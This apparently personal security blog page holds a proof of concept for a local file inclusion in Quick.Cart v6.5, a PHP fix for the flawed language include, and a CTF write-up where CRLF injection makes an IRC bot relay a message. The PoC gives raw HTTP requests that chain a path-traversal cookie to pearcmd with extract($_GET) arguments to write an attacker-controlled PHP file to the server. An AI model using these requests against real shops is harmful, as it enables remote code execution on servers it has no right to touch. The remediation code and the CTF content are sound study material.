AchN30

IT Security Enthusiast

POC - Quick.Cart v6.5 - Local File Inclusion

[LFI] Quick.Cart v6.5

admin.php::
... SNIP ...
extract( $_GET );
define( 'ADMIN_PAGE', true );
... SNIP ...

Funny, passing user input directly to extract x) --- We will need this later...

admin.php::
... SNIP ...
require 'database/config/general.php';
... SNIP ...

Let's dig here :p

database/config/general.php::
... SNIP ...
$config['change_language_to_polish'] = true;
if( !defined( 'CUSTOMER_PAGE' ) &&
    !empty( $_SERVER['HTTP_ACCEPT_LANGUAGE'] ) &&
    $config['change_language_to_polish'] === true &&
    preg_match( '/pl-|pl,|^pl$/', $_SERVER['HTTP_ACCEPT_LANGUAGE'] ) ) {
... SNIP ...
  if( isset( $_COOKIE['sAdminLanguage'] ) )
    $config['admin_lang'] = $_COOKIE['sAdminLanguage'];
... SNIP ...
require_once defined( 'CUSTOMER_PAGE' )
    ? $config['dir_lang'].LANGUAGE.'.php'
    : ( is_file( $config['dir_lang'].$config['admin_lang'].'.php' )
        ? $config['dir_lang'].$config['admin_lang'].'.php'
        : $config['dir_lang'].LANGUAGE.'.php' );
... SNIP ...

1. In "admin.php", CUSTOMER_PAGE is not defined
2. We can set the header "Accept-Language: pl-PL,pl;"
3. We control the cookies too

Means! 
$config['admin_lang'] is controlled :D

So we can include any file ending in ".php"
The path must point to a real file (is_file) -_-"
Actually nothing good to do...

maybe we can use PEAR sources :p

GET /qcv56/admin.php HTTP/1.1
Host: 127.0.0.1
Connection: close
Accept-Language: pl-PL,pl;
Cookie: sAdminLanguage=../../../../../../../../usr/lib/php/pearcmd;

Well done ... let's use the "extract($_GET)" to pass arguments to PEAR
-s -c ./files/83f2a5ec3fca.php -d preferred_mirror="<?php phpinfo() ?>"
tricky :p ...

GET /qcv56/admin.php?argv[]=&argv[]=-s&argv[]=-c&argv[]=./files/83f2a5ec3fca.php&argv[]=-dpreferred_mirror=<?php%20phpinfo()%20?> HTTP/1.1
Host: 127.0.0.1
Connection: close
Accept-Language: pl-PL,pl;
Cookie: sAdminLanguage=../../../../../../../../usr/lib/php/pearcmd;

GET /qcv56/files/83f2a5ec3fca.php HTTP/1.1
Host: 127.0.0.1
Connection: close

file created :)
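As an added example (not Quick.Cart's code), this is how the admin_lang include above can be pinned down: a strict allow-pattern on the cookie value plus a realpath() check that the resolved file stays inside dir_lang, falling back to the default LANGUAGE file otherwise. The helper name resolveAdminLangFile and the temporary language directory it is run against are constructed for the demo.

```php
<?php
// Added example (not Quick.Cart code): safe replacement for the cookie-driven
// language include shown above. $config/LANGUAGE names mirror the snippet;
// the helper name and the temp-dir demo are constructed.
declare(strict_types=1);

define('LANGUAGE', 'en');

// Resolve which admin language file to include. Only a short alphabetic tag is
// accepted, and the resolved path must stay inside $dirLang; anything else
// (traversal, null bytes, wrappers, missing files) falls back to LANGUAGE.
function resolveAdminLangFile(string $dirLang, ?string $requested): string
{
    $default = $dirLang . LANGUAGE . '.php';
    if ($requested === null || !preg_match('/^[a-z]{2,3}$/', $requested)) {
        return $default;   // strict allow-pattern instead of is_file() alone
    }
    $candidate = realpath($dirLang . $requested . '.php');
    $base      = realpath($dirLang);
    // realpath() is false for missing files; also pin the result to the lang dir
    if ($candidate === false || $base === false
        || strncmp($candidate, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return $default;
    }
    return $candidate;
}

// Constructed demo: a throwaway language directory holding en.php and pl.php
$dir = sys_get_temp_dir() . '/qc_lang_' . bin2hex(random_bytes(4)) . '/';
mkdir($dir);
file_put_contents($dir . 'en.php', "<?php\n");
file_put_contents($dir . 'pl.php', "<?php\n");

$cases = [
    'pl',                               // installed language     => pl.php
    'de',                               // not installed          => en.php
    '../../../../usr/lib/php/pearcmd',  // traversal from the PoC => en.php
    "pl\0",                             // null byte              => en.php
];
foreach ($cases as $c) {
    printf("%-36s => %s\n", addcslashes($c, "\0"), basename(resolveAdminLangFile($dir, $c)));
}
```

The extract($_GET) at the top of admin.php is a separate issue: even with this check in place, request keys should never be extracted straight into the script's scope.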

[ForbiddenBITS CTF 2013] [Writeup] [Hidden1 & Hidden2]

In the CTF IRC channel (irc://freenode.net/forbiddenbits) we see
in the description:
//try to have fun with our bot :D

So we tried to execute some commands, and we found a few of them: "!", "!help", "!flag", "!hidden", ...

[16:26] <AchN30_> !help
[16:26] <[FB]BOTx> 8,1 ima stupid bot :

Hidden Challenge 01:

[16:50] <AchN30_> !flag
[16:50] <[FB]BOTx> Here's Your Bloody Flag {bcba84b2e0774f4d30d630d7bce8afa1}

Flag: bcba84b2e0774f4d30d630d7bce8afa1

Hidden Challenge 02:

[16:28] <AchN30_> !hidden
[16:28] <[FB]BOTx> Make me say "CAN I HAZ FLAG" to Stephnix, dont forget to mention your nickname

Hmmm, let's try CRLF injection..

[16:43] <AchN30_> test\n PRIVMSG AchN30_ :HEllO WORLD!
[16:43] <[FB]BOTx> test
[16:43] <[FB]BOTx> HEllO WORLD!
Now we can query Stephnix to get the flag.

Cool, now let's get the flag :)

[16:47] <AchN30_> \n PRIVMSG Stephnix :AchN30_: CAN I HAZ FLAG
After a couple of minutes Stephnix queried AchN30_ with the flag.

Flag: c272047fb6327750109b0f9b95d2e6f4